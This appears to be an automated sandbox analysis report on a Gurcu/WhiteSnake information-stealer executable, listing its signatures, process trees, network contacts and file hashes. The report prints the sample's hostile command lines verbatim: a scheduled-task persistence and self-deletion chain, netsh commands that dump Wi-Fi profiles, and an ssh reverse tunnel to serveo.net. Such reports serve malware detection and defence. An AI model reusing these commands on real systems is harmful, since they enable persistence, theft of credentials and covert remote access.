Malware Analysis Report

2024-10-19 06:42

Sample ID 231014-eb6r4aef4z
Target Vfd663501e1ac13eb331505b8388e675450.exe
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
Tags
gurcu collection spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5

Threat Level: Known bad

The file Vfd663501e1ac13eb331505b8388e675450.exe was found to be: Known bad.

Malicious Activity Summary

gurcu collection spyware stealer

Detect Gurcu Stealer V3 payload

Gurcu, WhiteSnake

Gurcu family

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Deletes itself

Accesses Microsoft Outlook profiles

Looks up external IP address via web service

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

outlook_win_path

Runs ping.exe

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

outlook_office_path

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-14 03:47

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A

Gurcu family

gurcu

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-14 03:47

Reported

2023-10-14 19:53

Platform

win7-20230831-en

Max time kernel

152s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (binary certificate blob omitted) C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1980 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 1980 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 1980 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2472 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2472 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2472 wrote to memory of 2624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 2472 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2472 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2472 wrote to memory of 2664 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2472 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2472 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2472 wrote to memory of 2420 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2484 wrote to memory of 2980 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2484 wrote to memory of 2980 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2484 wrote to memory of 2980 N/A C:\Windows\system32\taskeng.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2472 wrote to memory of 1268 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2472 wrote to memory of 1268 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2472 wrote to memory of 1268 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 2980 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1652 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1652 wrote to memory of 2040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 1652 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1152 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1652 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 1652 wrote to memory of 2400 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2980 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2980 wrote to memory of 2364 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\system32\cmd.exe
PID 2364 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2364 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2364 wrote to memory of 2804 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2364 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2364 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2364 wrote to memory of 800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2364 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2364 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2364 wrote to memory of 936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\findstr.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe
PID 2980 wrote to memory of 1064 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Windows\system32\taskeng.exe

taskeng.exe {A3823695-31D8-4472-9AEF-FFF4FF5F1648} S-1-5-21-3185155662-718608226-894467740-1000:YETUIZPU\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7396 serveo.net

Network

Country Destination Domain Proto
N/A 127.0.0.1:7396 N/A tcp
US 8.8.8.8:53 github.com udp
US 140.82.112.3:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

memory/1980-0-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1980-1-0x0000000001030000-0x0000000001054000-memory.dmp

memory/1980-2-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

memory/1980-3-0x000000001B940000-0x000000001B9C0000-memory.dmp

memory/1980-4-0x000000001B940000-0x000000001B9C0000-memory.dmp

memory/1980-7-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/2980-11-0x0000000000890000-0x00000000008B4000-memory.dmp

memory/2980-12-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/2980-13-0x000000001ACE0000-0x000000001AD60000-memory.dmp

memory/2980-14-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/2980-15-0x000000001ACE0000-0x000000001AD60000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

memory/1268-18-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

memory/1268-19-0x000007FEF4FF0000-0x000007FEF59DC000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-14 03:47

Reported

2023-10-14 19:54

Platform

win10v2004-20230915-en

Max time kernel

114s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

Signatures

Detect Gurcu Stealer V3 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Gurcu, WhiteSnake

stealer gurcu

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 2580 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\System32\cmd.exe
PID 4368 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4368 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4368 wrote to memory of 4724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4368 wrote to memory of 4724 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4368 wrote to memory of 4552 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4368 wrote to memory of 4552 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 4368 wrote to memory of 408 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 4368 wrote to memory of 408 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe
PID 408 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 408 wrote to memory of 5096 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 5096 wrote to memory of 2628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 5096 wrote to memory of 2628 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 5096 wrote to memory of 3432 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 5096 wrote to memory of 3432 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 5096 wrote to memory of 3212 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 5096 wrote to memory of 3212 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 408 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 408 wrote to memory of 3688 N/A C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe C:\Windows\SYSTEM32\cmd.exe
PID 3688 wrote to memory of 4952 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3688 wrote to memory of 4952 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\chcp.com
PID 3688 wrote to memory of 4940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3688 wrote to memory of 4940 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\netsh.exe
PID 3688 wrote to memory of 5084 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe
PID 3688 wrote to memory of 5084 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\findstr.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vfd663501e1ac13eb331505b8388e675450.exe" &&START "" "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping 127.0.0.1

C:\Windows\system32\schtasks.exe

schtasks /create /tn "Vfd663501e1ac13eb331505b8388e675450" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

"C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show profiles

C:\Windows\system32\findstr.exe

findstr /R /C:"[ ]:[ ]"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\system32\findstr.exe

findstr "SSID BSSID Signal"

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 254.1.248.8.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
N/A 127.0.0.1:4742 N/A tcp

Files

memory/2580-0-0x00000215DCD60000-0x00000215DCD84000-memory.dmp

memory/2580-1-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp

memory/2580-2-0x00000215DEC10000-0x00000215DEC20000-memory.dmp

memory/2580-6-0x00007FFF56070000-0x00007FFF56B31000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
SHA1 0fedcad5039e3317d0e434bb038b81850e8f3599
SHA256 0792aa1b02541d3073171a711b5fe4563b4a7084cfc228606e696d17e45324e5
SHA512 edef804d22bf09d6eb3dfa397fb8ca609967a4af77db0cbb79aafee1510cd7f0a6087f7b66316592b14bff775df20b0877a58c9ee14fbe77a91171a7559fb301

C:\Users\Admin\AppData\Local\WindowsSecurity\Vfd663501e1ac13eb331505b8388e675450.exe

MD5 35625d89730f70f12ecdeaf795722865
